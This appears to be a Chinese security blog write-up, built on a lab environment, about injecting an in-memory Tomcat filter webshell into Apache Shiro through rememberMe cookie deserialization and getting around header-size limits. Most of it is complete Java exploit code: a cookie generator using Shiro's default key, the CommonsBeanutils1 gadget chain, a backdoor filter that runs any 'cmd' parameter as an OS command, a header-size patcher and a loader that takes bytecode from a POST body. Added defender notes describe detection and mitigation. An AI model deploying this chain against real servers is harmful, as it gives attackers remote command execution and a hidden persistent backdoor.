shiro注入filter内存马(绕过长度限制)

shiro环境

https://github.com/yyhuni/shiroMemshell(实验环境)
在这里插入图片描述
这里用的
Client_memshell.java

package com.example.demo;

import javassist.ClassPool;
import javassist.CtClass;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.util.ByteSource;

/**
 * Generator for the rememberMe cookie value used in this write-up: serializes the
 * CommonsBeanutils1 gadget chain carrying BehinderFilter's bytecode, then AES-encrypts
 * the result with the hard-coded key below and prints it.
 *
 * Defender note: the key used here is the one historically shipped as Shiro's default
 * rememberMe cipher key. An application is only exposed to this payload if it still
 * uses that default (or another key the attacker knows); a per-deployment random key
 * is the primary mitigation, independent of any header-size limit.
 */
public class Client_memshell {
    public static void main(String[] args) throws Exception {
        ClassPool pool = ClassPool.getDefault();
        // bytecode of the filter class that the gadget chain will define and instantiate
        CtClass clazz = pool.get(BehinderFilter.class.getName());
        byte[] payloads = new CommonsBeanutils1Shiro().getPayload(clazz.toBytecode());
        AesCipherService aes = new AesCipherService();
        byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA==");
        ByteSource ciphertext = aes.encrypt(payloads, key);
        // printed via printf, i.e. the ciphertext string is used as the format string
        System.out.printf(ciphertext.toString());
    }
}

BehinderFilter.java

package com.example.demo;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.lang.reflect.Field;
import org.apache.catalina.core.StandardContext;
import java.lang.reflect.InvocationTargetException;
import java.util.Map;
import java.io.IOException;
import org.apache.catalina.loader.WebappClassLoaderBase;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;
import java.lang.reflect.Constructor;
import org.apache.catalina.core.ApplicationFilterConfig;
import org.apache.catalina.Context;
import javax.servlet.*;

/**
 * The in-memory filter ("内存马") this write-up injects. It extends AbstractTranslet so
 * that TemplatesImpl instantiates it during deserialization, which runs the static
 * initializer below; the initializer registers this class as a servlet Filter on "/*"
 * purely through Tomcat's in-memory structures. Nothing is written to disk.
 *
 * Defender notes:
 *  - Detection: a FilterDef/FilterMap in StandardContext whose class is not present in
 *    the application's classpath or web.xml (here named "evil", mapped to "/*"); the
 *    "Do Filter ......" / "doFilter" lines this class prints to stdout on every request;
 *    child processes spawned by the Tomcat JVM.
 *  - Mitigation: the precondition is arbitrary deserialization (the Shiro rememberMe
 *    cookie in this write-up). Closing that sink removes the foothold; because the filter
 *    exists only in memory, a JVM restart also removes an already-injected instance.
 */
public class BehinderFilter extends AbstractTranslet implements Filter {
    static {
        try {
            final String name = "evil";
            final String URLPattern = "/*";
            // the deserializing thread's context class loader is the webapp loader, which
            // exposes the StandardContext of the running application
            WebappClassLoaderBase webappClassLoaderBase =
                    (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();
            // private map: filter name -> ApplicationFilterConfig
            Field Configs = standardContext.getClass().getDeclaredField("filterConfigs");
            Configs.setAccessible(true);
            Map filterConfigs = (Map) Configs.get(standardContext);
            BehinderFilter behinderFilter = new BehinderFilter();
            FilterDef filterDef = new FilterDef();
            filterDef.setFilter(behinderFilter);
            filterDef.setFilterName(name);
            filterDef.setFilterClass(behinderFilter.getClass().getName());
            /* add the filterDef to filterDefs */
            standardContext.addFilterDef(filterDef);
            FilterMap filterMap = new FilterMap();
            filterMap.addURLPattern(URLPattern);
            filterMap.setFilterName(name);
            filterMap.setDispatcher(DispatcherType.REQUEST.name());
            // inserted ahead of the existing filter mappings
            standardContext.addFilterMapBefore(filterMap);
            // ApplicationFilterConfig's constructor is not public; reflection is used to reach it
            Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
            constructor.setAccessible(true);
            ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);
            filterConfigs.put(name, filterConfig);
        } catch (NoSuchFieldException ex) {
            ex.printStackTrace();
        } catch (InvocationTargetException ex) {
            ex.printStackTrace();
        } catch (IllegalAccessException ex) {
            ex.printStackTrace();
        } catch (NoSuchMethodException ex) {
            ex.printStackTrace();
        } catch (InstantiationException ex) {
            ex.printStackTrace();
        }
    }

    // Translet methods required by AbstractTranslet; intentionally empty.
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }

    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
    }

    /**
     * Backdoor behaviour: a request carrying a {@code cmd} parameter is executed as an OS
     * command and its stdout is written back as the response body; any other request is
     * passed down the chain unchanged.
     */
    @Override
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        System.out.println("Do Filter ......");
        String cmd;
        if ((cmd = servletRequest.getParameter("cmd")) != null) {
            Process process = Runtime.getRuntime().exec(cmd);
            java.io.BufferedReader bufferedReader = new java.io.BufferedReader(new java.io.InputStreamReader(process.getInputStream()));
            StringBuilder stringBuilder = new StringBuilder();
            String line;
            while ((line = bufferedReader.readLine()) != null) {
                stringBuilder.append(line + '\n');
            }
            servletResponse.getOutputStream().write(stringBuilder.toString().getBytes());
            servletResponse.getOutputStream().flush();
            servletResponse.getOutputStream().close();
            return;
        }
        filterChain.doFilter(servletRequest, servletResponse);
        System.out.println("doFilter");
    }

    @Override
    public void destroy() {
    }
}

CommonsBeanutils1Shiro.java

package com.example.demo;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.PriorityQueue;

/**
 * Builds the CommonsBeanutils1 gadget chain as used against Shiro: a PriorityQueue
 * whose BeanComparator reads the "outputProperties" property of a TemplatesImpl,
 * which defines and instantiates the supplied class bytes when the queue is
 * deserialized.
 *
 * Defender notes: the chain requires commons-beanutils on the target classpath and a
 * deserialization sink reachable by the attacker (the rememberMe cookie here). It is a
 * well-known gadget chain; a serialization allow-list / ObjectInputFilter that rejects
 * BeanComparator and TemplatesImpl, or removing the sink, blocks it.
 */
public class CommonsBeanutils1Shiro {

    /**
     * Sets a declared (possibly private) field by reflection.
     *
     * @param obj       target object
     * @param fieldName field declared on obj's runtime class
     * @param value     value to assign
     * @throws Exception if the field does not exist or cannot be set
     */
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    /**
     * Serializes the gadget chain.
     *
     * @param clazzBytes bytecode of the class TemplatesImpl should load
     * @return Java-serialization bytes of the PriorityQueue gadget
     * @throws Exception on reflection or serialization failure
     */
    public byte[] getPayload(byte[] clazzBytes) throws Exception {
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{clazzBytes});
        setFieldValue(obj, "_name", "HelloTemplatesImpl");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
        final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
        // stub data for replacement later
        queue.add("1");
        queue.add("1");
        // the property name and the real elements are swapped in only after the adds,
        // so the stub comparisons above do not trigger the getter while building
        setFieldValue(comparator, "property", "outputProperties");
        setFieldValue(queue, "queue", new Object[]{obj, obj});
        // ==================
        // generate the serialized bytes
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(queue);
        oos.close();
        return barr.toByteArray();
    }
}

进行base64和aes加密
在这里插入图片描述
然后将这段输入漏洞处rememberme=
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
注意:
一开始输入这段很长的payload返回包会报400,如下:在这里插入图片描述
这是因为tomcat有最大请求头的长度限制,我本地添加如下(修改maxHTTPHeaderSize)
在这里插入图片描述
即可正常返回200,注入成功。因此实战过程中还需要绕过长度限制
https://zhuanlan.zhihu.com/p/516836433

同时代码中爆红

绕过长度限制(maxHttpHeaderSize)

网上给了三种解决方式
1.修改maxHttpHeaderSize
2.将class bytes使用gzip+base64压缩编码(暂不研究)
3.从POST请求体中发送字节码数据(强烈推荐)
第一种:

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

/**
 * First of the three length-limit workarounds listed in the post: a translet whose static
 * initializer reflectively raises Tomcat's maxHttpHeaderSize to 10000 — on the HTTP/1.1
 * protocol handler (affects connections created afterwards) and on the headerBufferSize
 * field of every input buffer already attached to a processor.
 *
 * Defender notes: this changes a live connector setting without touching server.xml, so a
 * running connector whose maxHttpHeaderSize differs from the configured value is an
 * indicator. Every failure is swallowed by the bare catch at the bottom, so the attempt
 * leaves no exception trace in the logs.
 */
@SuppressWarnings("all")
public class TomcatHeaderSize extends AbstractTranslet {
    static {
        try {
            java.lang.reflect.Field contextField = org.apache.catalina.core.StandardContext.class.getDeclaredField("context");
            java.lang.reflect.Field serviceField = org.apache.catalina.core.ApplicationContext.class.getDeclaredField("service");
            java.lang.reflect.Field requestField = org.apache.coyote.RequestInfo.class.getDeclaredField("req");
            java.lang.reflect.Field headerSizeField = org.apache.coyote.http11.Http11InputBuffer.class.getDeclaredField("headerBufferSize");
            java.lang.reflect.Method getHandlerMethod = org.apache.coyote.AbstractProtocol.class.getDeclaredMethod("getHandler", null);
            contextField.setAccessible(true);
            headerSizeField.setAccessible(true);
            serviceField.setAccessible(true);
            requestField.setAccessible(true);
            getHandlerMethod.setAccessible(true);
            org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase =
                    (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(webappClassLoaderBase.getResources().getContext());
            org.apache.catalina.core.StandardService standardService = (org.apache.catalina.core.StandardService) serviceField.get(applicationContext);
            org.apache.catalina.connector.Connector[] connectors = standardService.findConnectors();
            for (int i = 0; i < connectors.length; i++) {
                // scheme is matched by length (4 == "http") rather than by string comparison
                if (4 == connectors[i].getScheme().length()) {
                    org.apache.coyote.ProtocolHandler protocolHandler = connectors[i].getProtocolHandler();
                    if (protocolHandler instanceof org.apache.coyote.http11.AbstractHttp11Protocol) {
                        Class[] classes = org.apache.coyote.AbstractProtocol.class.getDeclaredClasses();
                        for (int j = 0; j < classes.length; j++) {
                            // org.apache.coyote.AbstractProtocol$ConnectionHandler
                            // (again identified by name length, not by name)
                            if (52 == (classes[j].getName().length()) || 60 == (classes[j].getName().length())) {
                                java.lang.reflect.Field globalField = classes[j].getDeclaredField("global");
                                java.lang.reflect.Field processorsField = org.apache.coyote.RequestGroupInfo.class.getDeclaredField("processors");
                                globalField.setAccessible(true);
                                processorsField.setAccessible(true);
                                org.apache.coyote.RequestGroupInfo requestGroupInfo = (org.apache.coyote.RequestGroupInfo) globalField.get(getHandlerMethod.invoke(protocolHandler, null));
                                java.util.List list = (java.util.List) processorsField.get(requestGroupInfo);
                                for (int k = 0; k < list.size(); k++) {
                                    org.apache.coyote.Request tempRequest = (org.apache.coyote.Request) requestField.get(list.get(k));
                                    // 10000 is the modified header size
                                    headerSizeField.set(tempRequest.getInputBuffer(), 10000);
                                }
                            }
                        }
                        // 10000 is the modified header size
                        ((org.apache.coyote.http11.AbstractHttp11Protocol) protocolHandler).setMaxHttpHeaderSize(10000);
                    }
                }
            }
        } catch (Exception e) {
        }
    }

    // Translet methods required by AbstractTranslet; intentionally empty.
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }
}

思路是改变org.apache.coyote.http11.AbstractHttp11Protocol的maxHttpHeaderSize的大小,这个值会影响新的Request创建inputBuffer时对header长度的限制

第三种的实现如下:

tomcat+shiro环境下

还是利用CommonsBeanutils1Shiro类和Client_memshell类,ClassDataLoader为最终写好的绕过类(相当于加载器类)
ClassDataLoader.java

package com.example.demo;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

/**
 * Third workaround from the post ("send the bytecode in the POST body"): a small translet
 * delivered through the rememberMe cookie that does not carry the filter bytecode itself.
 * Its constructor walks the live HTTP processor threads, reads the Base64 "classData"
 * request parameter from the current request, defines that class in the webapp class
 * loader and instantiates it, so the large payload travels in the body, not the header.
 *
 * Defender notes: the cookie stays small, so header-size limits alone do not stop this
 * variant; the effective control is still closing the deserialization sink. A request
 * combining a rememberMe cookie with a large Base64 "classData" parameter is a
 * detection signature specific to this loader.
 */
public class ClassDataLoader extends AbstractTranslet{
    public ClassDataLoader() throws Exception {
        Object o;
        String s;
        String classData = null;
        boolean done = false;
        // every thread in the current thread group, via the private "threads" array
        Thread[] ts = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), "threads");
        for (int i = 0; i < ts.length; i++) {
            Thread t = ts[i];
            if (t == null) {
                continue;
            }
            s = t.getName();
            // only threads whose name contains "http" but not "exec" are inspected
            if (!s.contains("exec") && s.contains("http")) {
                o = getFV(t, "target");
                if (!(o instanceof Runnable)) {
                    continue;
                }
                try {
                    o = getFV(getFV(getFV(o, "this$0"), "handler"), "global");
                } catch (Exception e) {
                    continue;
                }
                java.util.List ps = (java.util.List) getFV(o, "processors");
                for (int j = 0; j < ps.size(); j++) {
                    Object p = ps.get(j);
                    o = getFV(p, "req");
                    // getNote(1): presumably the container request wrapping this coyote request — not verifiable here
                    Object conreq = o.getClass().getMethod("getNote", new Class[]{int.class}).invoke(o, new Object[]{new Integer(1)});
                    classData = (String) conreq.getClass().getMethod("getParameter", new Class[]{String.class}).invoke(conreq, new Object[]{new String("classData")});
                    byte[] bytecodes = org.apache.shiro.codec.Base64.decode(classData);
                    java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class});
                    defineClassMethod.setAccessible(true);
                    Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), new Object[]{bytecodes, new Integer(0), new Integer(bytecodes.length)});
                    // instantiation runs the loaded class's static initializer
                    cc.newInstance();
                    done = true;
                    if (done) {
                        break;
                    }
                }
            }
        }
    }

    /**
     * Reads field {@code s} of {@code o} by reflection, searching up the class hierarchy.
     *
     * @param o object to read from
     * @param s field name
     * @return the field's value
     * @throws NoSuchFieldException if no class below Object declares the field
     * @throws Exception on other reflection failures
     */
    public Object getFV(Object o, String s) throws Exception {
        java.lang.reflect.Field f = null;
        Class clazz = o.getClass();
        while (clazz != Object.class) {
            try {
                f = clazz.getDeclaredField(s);
                break;
            } catch (NoSuchFieldException e) {
                clazz = clazz.getSuperclass();
            }
        }
        if (f == null) {
            throw new NoSuchFieldException(s);
        }
        f.setAccessible(true);
        return f.get(o);
    }

    // Translet methods required by AbstractTranslet; intentionally empty.
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }
}

在这里插入图片描述
和上面的实现不一样的是,这里我们用Client_memshell来对绕过用的加载类进行AES+base64加密,将得到的结果放到头部cookie的rememberme=处
本次实验加载器得到的结果如下(每次运行都不一样,所以以后用的时候还需要代码生成,不能直接搬运)

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

而我们的恶意类BehinderFilter(也就是内存马)进行base64编码+url编码后,放到classData参数处(参数名必须是classData,因为加载类中是按这个名字getParameter读取的,其他名字不行)

cat /root/Desktop/BehinderFilter.class|base64 |sed ':label;N;s/\n//;b label'

在这里插入图片描述
在这里插入图片描述
然后放到数据包中即可

成功截图:
在这里插入图片描述
在这里插入图片描述
之后完善分段加载方式
